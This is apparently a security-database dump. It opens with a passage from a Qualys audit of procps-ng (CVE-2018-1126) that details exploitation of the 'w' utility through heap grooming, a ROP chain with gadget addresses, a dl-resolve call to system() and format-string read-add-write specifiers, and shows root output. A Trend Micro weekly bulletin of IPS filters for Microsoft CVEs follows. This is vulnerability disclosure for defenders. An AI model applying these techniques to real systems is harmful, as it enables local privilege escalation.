\"tot + c \n+ align\" are not exploitable beyond a denial of service: they result in \nan mmap-based buffer overflow of rbuf, but with pointers only (pointers \nto our command-line argument strings, and a NULL terminator). Similarly, \nwe were unable to exploit the integer overflow of \"tot\" on 32-bit. \n \nOn 64-bit, however, the integer overflow of \"tot\" results in a memcpy() \nof arbitrary bytes (our command-line arguments) to an offset of roughly \n-2GB below rbuf. Surprisingly, the \"xrealloc(rbuf, tot + n)\" before the \nmemcpy() does not exit() when \"tot\" becomes negative, because xrealloc() \nincorrectly uses an \"unsigned int size\" argument instead of a size_t \n(CVE-2018-1126): \n \n66 void *xrealloc(void *oldp, unsigned int size) { \n \n======================================================================== \n5.2. Exploitation \n======================================================================== \n \nTo exploit the integer overflow of \"tot\" on 64-bit, we are faced with \nseveral difficulties: \n \n- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing \nProtector), and FORTIFY. \n \n- Our exploit must be one-shot, or as close to one-shot as possible: we \nmay use brute-force if the target procps-ng utility is executed by a \nscript, but we have only one chance to exploit this vulnerability if \nthe target utility is executed manually by an administrator. \n \n- We have no control over the target utility's command-line arguments, \nenvironment variables, or resource limits (it is executed by another \nuser, administrator, or script), and we have no direct channel for an \ninformation leak (we have no access to the target utility's output, \nfor example). \n \n- We were unable to exploit the integer overflow of \"tot\" when rbuf is \nmmap()ed (but we were also unable to prove that it is unexploitable); \nwhen the integer \"tot\" overflows, rbuf is an mmap()ed chunk (its size \nis roughly 2GB), and because Linux's mmap() is a top-down allocator, \nwe believe that: \n \n. rbuf must be allocated in a hole of the mmap-space (to survive the \nmemcpy() at a negative offset below rbuf); \n \n. it is impossible to make such a large hole (in procps-ng, calls to \nthe malloc functions are extremely rare). \n \nDespite these difficulties, we developed proof-of-concept exploits \nagainst the procps-ng utility \"w\" on Ubuntu 16.04 (a one-shot exploit \nagainst a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly \none-shot exploit against a full RELRO, PIE w): if we first force \"w\" to \nmalloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than \nmmap_threshold = 128KB), then malloc() will not call mmap() anymore, but \nwill call brk() instead, even for chunks larger than mmap_threshold. The \n2GB rbuf (after the integer overflow of tot) will therefore be allocated \non the heap by brk(), and because brk() is a bottom-up allocator, we can \neasily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning \nof the heap: \n \n- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure \nand its function pointers; \n \n- if w is a PIE, we overwrite the glibc's internal *gettext() structures \nand transform this memory corruption into a format-string exploit. \n \nTo force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs \n(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently, \n/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default, \neven on 64-bit). This is not an unusual setting: large servers (database \nservers, container and storage platforms) commonly increase the value of \npid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit \nour ability to spawn 64K processes: /proc/sys/kernel/threads-max, \nRLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max, \nhowever, these limits are not insuperable obstacles: \n \n- they may be naturally greater than 64K, depending on the total number \nof RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or \nthe value of pid_max (for UserTasksMax); \n \n- they may not apply to the attacker's user account (for example, \nsystemd-logind may not at all manage this specific user account); \n \n- in any case, we do not need to spawn 64K concurrent processes: if we \nuse /proc/PID/cmdline as a FUSE-backed synchronization tool, we need \nonly a few concurrent processes. \n \n======================================================================== \n5.3. Exploitation details \n======================================================================== \n \nOur proof-of-concept exploit spawns five different types of processes \n(\"main\", \"mmap\", \"dist\", \"wrap\", and \"srpt\"): \n \n- a long-lived \"main\" process, which spawns and coordinates the other \nprocesses; \n \n- 64K long-lived \"mmap\" processes, which guarantee that the ~2GB rbufs \nof our \"dist\" and \"wrap\" processes are allocated by brk() in the heap \nof our future \"w\" target; the \"mmap\" processes occupy the lowest PIDs \navailable, to avoid interference from other processes with the heap \nlayout of w; \n \n- a long-lived \"dist\" (\"distance\") process, whose /proc/PID/cmdline is \ncarefully constructed to cover the exact distance between our target \nstructure (at the beginning of w's heap) and the rbuf of our \"wrap\" \nprocess (at the end of w's heap); \n \n- a long-lived \"wrap\" (\"integer wrap\") process, which overflows the \ninteger \"tot\" and overwrites our target structure at the beginning of \nw's heap (with the memcpy() at rbuf - 2GB); \n \n- short-lived \"srpt\" (\"simulate readproctab\") processes, which measure \nthe exact distance between our target structure (at the beginning of \nw's heap) and the rbuf of our \"wrap\" process (at the end of w's heap); \nbecause this distance depends on an accurate list of processes running \non the system, our exploit regularly spawns \"srpt\" processes until the \ndistance stabilizes (it is particularly unstable after a reboot). \n \nWe use a few noteworthy tricks in this exploit: \n \n- we do not fork() but clone() the \"mmap\" processes (we use the flags \nCLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but \nnot CLONE_THREAD, because each process must have its own /proc/PID \nentry): this is much faster, and significantly reduces the memory \nconsumption of our exploit (the target \"w\" process itself already \nconsumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the \n\"mmap\", \"dist\", and \"wrap\" processes); \n \n- we analyze the ~2GB command-line argument strings of our \"dist\" and \n\"wrap\" processes, to detect repeated patterns and replace them with \nour equivalent file-backed mmap()s (this further reduces the memory \nconsumption of the exploit); moreover, we replace the argv[] pointers \nof these processes with PROT_NONE mmap()s (hundreds of megabytes that \nare never accessed); \n \n- we initially simulated readproctab() with our own exploit code, but \neventually switched to a small LD_PRELOAD library that instruments the \nreal \"w\" utility and provides more accurate measurements. \n \nThere is much room for improvement in this proof-of-concept exploit: for \nexample, it depends on the exact distance between our target structure \n(at the beginning of w's heap) and the rbuf of our \"wrap\" process (at \nthe end of w's heap), but this distance is hard to measure inside a \ncontainer, because processes running outside the container are not \nvisible inside the container (brute-force may be a solution if the \ntarget utility is executed by a script, but not if it is executed \nmanually by an administrator; better solutions may exist). \n \n======================================================================== \n5.4. Non-PIE exploitation \n======================================================================== \n \nIn this section, we describe our simplest proof-of-concept exploit, \nagainst the non-PIE \"w\" on Ubuntu 16.04: we overflow the integer \"tot\" \nin file2strvec(), we overwrite the PROCTAB structure and its function \npointers, and we jump into the executable segment of w. However, w is \nvery small and contains no useful gadgets, syscall instructions, or \nlibrary calls. Instead, we use a technique pioneered by Nergal in \nhttp://phrack.org/issues/58/4.html (\"5 - The dynamic linker's \ndl-resolve() function\"): \n \nWe jump to the very beginning of w's PLT (Procedure Linkage Table), \nwhich calls _dl_runtime_resolve() and _dl_fixup() with a \"reloc_arg\" \nthat we control (it is read from the stack) and that indexes our own \nfake Elf64_Rela structure (in w's heap), which in turn indexes a fake \nElf64_Sym structure, which in turn indexes a string that we control and \nthat allows us to call any library function, by name (even if it does \nnot appear in w's PLT). The obvious choice here is the \"system\" \nfunction: \n \n- the RDI register (the first argument of the function pointer that we \noverwrote, and hence the command argument of system()) points to the \nPROCTAB structure, whose contents we control; \n \n- we do not need to worry about the privilege dropping of /bin/sh, \nbecause w is not a set-user-ID executable. \n \nFinally, we must solve two practical problems to use this dynamic-linker \ntechnique against w: \n \n- our fake ELF structures are located in the heap, but indexed from the \nexecutable, and a random gap separates the heap from the executable: \nwe therefore allocate four large areas in the heap (large enough to \ndefeat the randomization of the heap), one for each of our fake \nstructures (Elf64_Rela, Elf64_Sym, \"system\", and ndx for symbol \nversioning); \n \n- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym \nare 24-byte structures: luckily, the last 8 bytes of these structures \nare unused, and we therefore truncate our fake structures to 16 bytes. \n \nFor example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with \nthe following ROP chain: \n \nprocfs taskdir tdu df finder reader tfinder \n|--------|--------|----+---|--------|--------|--------|------|--------|--------| \n| id>>/tmp/w.$$ |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50| \n|--------|--------|----+---|--------|--------|--------|------|--------|--------| \n0xffb8 bytes \n \n- the first gadget that we execute, 0x4020bb, pivots the stack pointer \nto RDI (which points to the very beginning of the PROCTAB structure): \n\"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;\" \n \n- the second gadget that we execute, 0x4029db, increases the stack \npointer by 0xffb8 bytes (it would otherwise crash into the beginning \nof the heap, because the stack grows down): \"ret 0xffb8;\" \n \n- the third gadget that we execute, 0x401100, calls \n_dl_runtime_resolve() and _dl_fixup() with our own \"relocarg\" (this \neffectively calls system() with the command located at RDI, \n\"id>>/tmp/w.$$\"): \n \n401100: ff 35 02 2f 20 00 pushq 0x202f02(%rip) \n401106: ff 25 04 2f 20 00 jmpq *0x202f04(%rip) \n \n- the fourth gadget that we execute, 0x402a50, makes a clean exit: \n \n402a50: bf 01 00 00 00 mov $0x1,%edi \n402a55: e8 36 e7 ff ff callq 401190 <_exit@plt> \n \n$ ./w-exploit-Non-PIE \npositive_tot 2147482113 \ndistance_tot 2147482112 \ndistance 12024752 \n... \ndistance 12024752 \noff 279917264 \nver_beg 2e26ce0 ver_end 5426ce0 \nrel_beg 15f19fb0 rel_end 18519fb0 \nstr_beg 2900d280 str_end 2b60d280 \nsym_beg 3c100570 sym_end 3e700570 \nreloc_arg 16957128 \nnentries 5 \nPOSITIVE_TOT 2147482113 \nDISTANCE_TO_PT 1 \nnegwrite_off 2147485183 \nnentries 1 \nready \n \nThen, if an administrator executes w: \n \n# cat /tmp/w.* \ncat: '/tmp/w.*': No such file or directory \n \n# w \n \n# cat /tmp/w.* \nuid=0(root) gid=0(root) groups=0(root) \n \n======================================================================== \n5.5. PIE exploitation \n======================================================================== \n \nIn this section, we describe our proof-of-concept exploit against the \nPIE \"w\" on Debian 9 and Fedora 27. The first technique that we tried, a \npartial overwrite of a function pointer in the PROCTAB structure, does \nnot work: \n \n- we are limited to a 2-byte overwrite, or else we lose the \"one-shot\" \nquality of our exploit (we must brute-force the random bits that we \noverwrite); \n \n- the original function pointer refers to a piece of code in libprocps \nthat offers a very limited choice of gadgets; \n \n- file2strvec() ends our command-line argument strings (which overwrite \nthe function pointer) with a null byte, and further reduces the number \nof available gadgets. \n \nOur second, working technique is derived from halfdog's fascinating \nhttps://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and \ntransforms libprocps's integer overflow and memory corruption into a \nformat-string exploit: \n \n- we overwrite the dirname pointer to \"/usr/share/locale\" (a member of \nthe struct binding malloc()ated at the very beginning of w's heap by \nbindtextdomain()) with a pointer to \"/tmp\" -- we do not need to worry \nabout ASLR, because we arrange for file2strvec() to overwrite dirname \nwith a pointer to our command-line argument strings; alternatively, we \ncould overwrite the \"procps-ng\" string (malloc()ated at the beginning \nof w's heap by textdomain()), but this would also overwrite the chunk \nheader of the struct PROCTAB, and would cause a crash in closeproc(); \n \n- we thereby control the translation strings returned by the *gettext() \nfunctions and the _() macro (the overwritten dirname pointer is used \nto construct the names of the translation files \".mo\") and therefore \ncontrol two format-strings in w's main(): \n \n591 printf(_(\"%-*s TTY \"), userlen, _(\"USER\")); \n... \n595 printf(_(\" LOGIN@ IDLE JCPU PCPU WHAT\\n\")); \n \n- we exploit the first format-string to create a pointer to a saved RIP \non the stack, and we write this pointer to the stack itself; \n \n- we use this pointer, and the second format-string, to overwrite the \nsaved RIP with the address of a useful libc gadget (we return into \npopen() on Debian 9, and wordexp() on Fedora 27). \n \nHowever, unlike halfdog, we cannot defeat ASLR by simply dumping the \ncontents of the stack with a format-string, because we have not access \nto the output of \"w\" (it is executed by another user, administrator, or \nscript). Instead, we implement Chris Evans's \"read-add-write\" primitive \nhttps://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-advancing-exploitation.html \n(\"Trick #6: co-opting an addition primitive\") with format-strings only. \n \nWith the first format-string: \n \n- we \"read\" the LSW (Least Significant Word, 32 bits) of a stack pointer \nthat is located on the stack itself and hence accessible through the \nformat-string arguments -- for example, the argv pointer; \n \n- we \"add\" a distribution-specific constant to this LSW, to make it \npoint to a saved RIP on the stack -- for example, the saved RIP pushed \nonto the stack by the call to printf_positional() in vfprintf(); \n \n- we \"write\" this modified LSW to the LSW of another stack pointer that \nis also located on the stack itself and hence accessible through the \nformat-string arguments -- for example, the argv[0] pointer. \n \nWith the second format-string: \n \n- we \"read\" the LSW of a libc pointer that is located on the stack and \nhence accessible through the format-string arguments -- for example, \nthe pointer to __libc_start_main(); \n \n- we \"add\" a distribution-specific constant to this LSW, to make it \npoint to a useful libc gadget -- for example, popen() or wordexp(); \n \n- we \"write\" this modified LSW to the LSW of a saved RIP on the stack: \nwe use the pointer (to the saved RIP) created on the stack by the \nfirst format-string. \n \nTo implement the \"read-add-write\" primitive: \n \n- we \"read\" the LSW of a pointer (we load it into vfprintf's internal \ncharacter counter) through a variable-width specifier such as \"%*R$x\", \nwhere R is the position (among the format-string arguments on the \nstack) of the to-be-read pointer; \n \n- we \"add\" a constant A to this LSW through a constant-width specifier \nsuch as \"%Ax\"; \n \n- we \"write\" this modified LSW to the LSW of another pointer through a \nspecifier such as \"%W$n\", where W is the position (among the format- \nstring arguments on the stack) of a pointer to the to-be-overwritten \npointer (for example, in our first format-string we overwrite the LSW \nof the argv[0] pointer through the argv pointer, and in our second \nformat-string we overwrite the LSW of a saved RIP through the \noverwritten argv[0] pointer); in summary: \n \n. if we want to \"add\" a constant to the LSW that we \"read\", we use a \nsimple format-string such as \"%*R$x%Ax%W$n\", where A is equal to the \nconstant that we want to add; \n \n. if we want to \"subtract\" a constant from the LSW that we \"read\", we \nuse a format-string such as \"%*R$x%W$n%Ax%W$hn\", where A is equal to \n65536 minus the constant that we want to subtract (the smaller the \nconstant, the higher the probability of success). \n \nThis generic technique defeats NX, ASLR, PIE, SSP, and FORTIFY, but it \nsuffers from three major drawbacks: \n \n- it requires two different format-strings, because it must reset \nvfprintf's internal character counter between the two \"read-add-write\" \nprimitives; \n \n- its probability of success is 1/4 (not a one-shot, but not a \nbrute-force either), because the probability of success of each \n\"read-add-write\" primitive is 1/2 (the randomized LSW that is \"read\" \nas an \"int width\" must be positive), and the stack is randomized \nindependently of the libc; \n \n- it outputs 2*1GB on average (2*2GB at most): this may be acceptable if \nthe target utility is executed by a script or daemon, but not if it is \nexecuted manually by an administrator (terminal escape sequences may \nbe used to overcome this drawback, but we did not explore this \npossibility yet). \n \nIt is also possible to implement distribution-specific variants of this \ngeneric technique: for example, we developed a Debian-specific version \nof our \"w\" exploit that requires only one format-string, has an 11/12 \nprobability of success (nearly one-shot), and outputs only a few \nkilobytes. This is left as an exercise for the interested reader. \n \n \n======================================================================== \nAcknowledgments \n======================================================================== \n \nWe thank Craig Small and the members of linux-distros@openwall and \nsecurity@kernel. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147806/qualys-procps-ng-audit-report.txt"}], "trendmicroblog": [{"lastseen": "2017-09-25T14:43:29", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0161", "CVE-2017-11761", "CVE-2017-11764", "CVE-2017-11766", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-8567", "CVE-2017-8597", "CVE-2017-8628", "CVE-2017-8629", "CVE-2017-8630", "CVE-2017-8631", "CVE-2017-8632", "CVE-2017-8643", "CVE-2017-8648", "CVE-2017-8649", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8685", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8696", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8704", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8710", "CVE-2017-8711", "CVE-2017-8712", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8716", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8724", "CVE-2017-8725", "CVE-2017-8728", "CVE-2017-8729", "CVE-2017-8731", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8739", "CVE-2017-8740", "CVE-2017-8741", "CVE-2017-8742", "CVE-2017-8743", "CVE-2017-8744", "CVE-2017-8745", "CVE-2017-8746", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8751", "CVE-2017-8752", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8758", "CVE-2017-8759", "CVE-2017-9417"], "description": "\n\nIn last week\u2019s [blog](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-september-4-2017/>), I mentioned the Apache Struts vulnerability, which is still making headlines as estimates show that as many as 65 percent of Fortune 500 companies use it in some form. In addition, Equifax claims [it has played a role](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) in their breach affecting more than 143 million Americans.\n\nOn July 11, 2017, Digital Vaccine\u00ae (DV) filter 29068 (HTTP: Apache Struts 2 Struts 1 Plugin Remote Code Execution Vulnerability) was shipped to customers using TippingPoint solutions to address a vulnerability in Struts. Once the TippingPoint DVLabs team discovered the exploit code for CVE-2017-12611, it was tested and the team found that DV filter 29068 effectively covered this vulnerability while it was still a 0-day for nearly two months! Looking at data from a small percentage of customers using TippingPoint solutions, the DVLabs team has seen significant activity from filter 29068, including a mixture of both scanning/fingerprinting attempts of the vulnerability, as well as actual exploit attempts. Since this DV filter was available since July, customers have been able to use it as a virtual patch to protect their networks while they work out their process to patch the Apache vulnerability and make other system and policy adjustments.\n\nFor more information on the Apache Struts vulnerability and Trend Micro coverage, please reference the following blogs:\n\n| \n\n * [CVE-2017-5638: Apache Struts 2 Vulnerability Leads to Remote Code Execution](<http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/>)\n * [New Apache Struts Vulnerability Could Be Worse than POODLE](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/new-apache-struts-vulnerability-could-be-worse-than-poodle>) \n---|--- \n| \n \n**TippingPoint\u00ae Threat Management Center (TMC) and ThreatLinQ Planned System Outage Notification**\n\nEffective Sunday, September 24, 2017, Trend Micro is introducing an enhanced License Manager feature to allow for easier management of licenses for the TippingPoint Threat Protection System (TPS) family of products. In order to deploy the new feature, both the Threat Management Center (TMC) and ThreatLinQ Web sites will be intermittently unavailable during the following dates and times:\n\n**From** | **Time** | **To** | **Time** \n---|---|---|--- \nFriday, September 22, 2017 | 7:00 PM (CDT) | Sunday, September 24, 2017 | 8:00 PM (CDT) \nSaturday, September 23, 2017 | 12:00 AM (UTC) | Monday, September 25, 2017 | 1:00 AM (UTC) \n \n \n\nDuring the upgrade window, the Security Management System (SMS), Intrusion Prevention System (IPS), Next Generation Firewall (NGFW), Threat Protection System (TPS) and ArcSight Enterprise Security Manager (ESM) connectivity to the TMC will be intermittently unavailable. This will prevent Digital Vaccine (DV), Threat Digital Vaccine (ThreatDV), Reputation Security Monitor (RepSM) and TippingPoint Operating System (TOS) updates from occurring until the upgrade is completed. Customers with any questions or concerns can contact the TippingPoint Technical Assistance Center (TAC).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before September 12, 2017. Microsoft released a whopping 81 security patches for September covering Windows, Internet Explorer (IE), Edge, Exchange, .NET Framework, Office, and Hyper-V. 26 of the patches are listed as Critical, 53 are rated Important, and two are Moderate in severity. 10 of the Microsoft CVEs came through the Zero Day Initiative program. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [September 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/9/12/the-september-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0161 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8567 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8597 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8628 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8629 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8630 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8631 | 29599 | \nCVE-2017-8632 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8643 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8648 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8649 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8660 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8675 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8676 | *28226 | \nCVE-2017-8677 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8678 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8679 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8680 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8681 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8682 | 29569 | \nCVE-2017-8683 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8684 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8685 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8686 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8687 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8688 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8692 | *28737 | \nCVE-2017-8695 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8696 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8699 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8702 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8704 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8706 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8707 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8708 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8709 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8710 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8711 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8712 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8713 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8714 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8716 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8719 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8720 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8723 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8724 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8725 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8728 | 29574 | \nCVE-2017-8729 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8731 | 29577 | \nCVE-2017-8733 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8734 | 29579 | \nCVE-2017-8735 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8736 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8737 | *28736 | \nCVE-2017-8738 | *28981 | \nCVE-2017-8739 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8740 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8741 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8742 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8743 | *29153 | \nCVE-2017-8744 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8745 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8746 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8747 | 29581 | \nCVE-2017-8748 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8749 | 29575 | \nCVE-2017-8750 | 29576 | \nCVE-2017-8751 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8752 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8753 | 29573 | \nCVE-2017-8754 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8755 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8756 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8757 | 29578 | \nCVE-2017-8758 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8759 | 29600 | \nCVE-2017-9417 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11761 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11764 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11766 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**Mobile Pwn2Own 2017 Returns to Tokyo!**\n\nThe Zero Day Initiative is pleased to announce the sixth annual Mobile Pwn2Own\u2122 competition will return at this year\u2019s [PacSec](<https://pacsec.jp/>) conference in Tokyo on November 1-2, 2017. The tradition of crowning a Master of Pwn will also return as some of the world\u2019s top security researchers demonstrate attacks on the most popular mobile devices. More than $500,000 USD will be available in the prize pool, with add-on bonuses for exploits that meet a higher bar of difficulty. For details on targets and challenges as well as the complete set of rules, click [here](<https://www.zerodayinitiative.com/blog/2017/8/24/mobile-pwn2own-2017-returns-to-tokyo>).\n\n**Zero-Day Filters**\n\nThere are 18 new zero-day filters covering seven vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (1)_**\n\n| \n\n * 29584: ZDI-CAN-5034: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Delta (1)_**\n\n| \n\n * 29557: HTTP: Delta Industrial Automation WPLSoft File Parser Usage (ZDI-17-698) \n---|--- \n| \n \n**_Eaton (1)_**\n\n| \n\n * 29558: HTTP: Eaton ELCSoft Buffer Overflow Vulnerability (ZDI-17-519) \n---|--- \n| \n \n**_Foxit (12)_**\n\n| \n\n * 29544: ZDI-CAN-5016: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29545: ZDI-CAN-5017: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29546: ZDI-CAN-5018: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29552: ZDI-CAN-5019: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29553: ZDI-CAN-5020,5027,5029: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29555: ZDI-CAN-5021: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29556: ZDI-CAN-5022: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29559: ZDI-CAN-5023: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29563: ZDI-CAN-5024: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29564: ZDI-CAN-5025: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29565: ZDI-CAN-5026: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29566: ZDI-CAN-5028: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_Mitsubishi Electric (1)_**\n\n| \n\n * 29448: HTTP: Mitsubishi Electric E-Designer SetupAlarm Font Buffer Overflow Vulnerability (ZDI-17-508) \n---|--- \n| \n \n**_Schneider Electric (1)_**\n\n| \n\n * 29550: HTTP: Schneider Electric U.motion Builder SOAP Request SQL Command Execution (ZDI-17-387) \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 29452: HTTP: Trend Micro Control Manager cgiShowClientAdm Authentication Request (ZDI-17-244) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-september-4-2017/>).", "modified": "2017-09-15T14:59:53", "published": "2017-09-15T14:59:53", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-september-11-2017/", "id": "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of September 11, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:07:35", "description": "### Summary\r\nAn exploitable use-after-free vulnerability exists in the account parsing component of the 